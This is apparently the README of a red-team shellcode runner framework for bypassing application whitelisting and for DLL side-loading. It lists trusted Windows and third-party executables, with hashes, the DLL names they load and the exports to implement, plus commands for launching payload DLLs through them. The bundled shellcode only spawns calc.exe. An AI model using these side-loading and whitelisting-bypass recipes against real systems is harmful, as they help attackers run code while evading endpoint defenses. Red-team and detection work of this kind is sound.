Shellcode runner framework for application whitelisting bypasses and DLL side-loading. The shellcode included in this project spawns calc.exe.
Authors: Evan Pena (@evan_pena2003), Ruben Boonen (@FuzzySec), Casey Erikson (@EriksocSecurity), Brett Hawkins (@h4wkst3r)
If desired, change the injection type by modifying the following line to the appropriate injection type
public const ExecutionMethod method = ExecutionMethod.CreateThread;
Blog Post References:
https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html
https://www.fireeye.com/blog/threat-research/2020/01/abusing-dll-misconfigurations.html
Running the DLL with the following legitimate exes
Export: CPlApplet
Syntax: Rename compiled “dll” extension to “cpl” and just double click it!
Control.exe [cplfile]
Rundll32.exe Shell32.dll, Control_RunDLL [cplfile]
Export: powershell
rasautou –d {dllpayload} –p powershell –a a –e e
Export: DllUnregisterServer
msiexec /z {full path to msiexec.dll}
Executable: SubWCRev.exe
File Path: C:\Program Files\Tortoise SVN\bin
MD5 Hash: c422a95929dd627b4c2be52226287003
DLL == "crshhndl.dll"; Arch == x64; OS == Win7 & 10;
Exports: InitCrashHandler,SendReport,IsReadyToExit,SetCustomInfo,AddUserInfoToReport,RemoveUserInfoFromReport,AddFileToReport,RemoveFileFromReport,GetVersionFromApp,GetVersionFromFile
Executable: Dism.exe
File Path: C:\Windows\System32
MD5 Hash: 5e70ab0bf74bba785b83da53a3056a21
DLL == "DismCore.dll"; Arch == x64; OS == Win7 & 10;
Export: DllGetClassObject
Executable: PotPlayer.exe
File Path: {Installation Directory}
MD5 Hash: f16903b2ff82689404f7d0820f461e5d
DLL == "PotPlayer.dll"; Arch == x86;
Exports: PreprocessCmdLineExW,UninitPotPlayer,CreatePotPlayerExW,DestroyPotPlayer,SetPotPlayRegKeyW,RunPotPlayer
Credit for the DueDLLigence name goes to Paul Sanders (@saul_panders)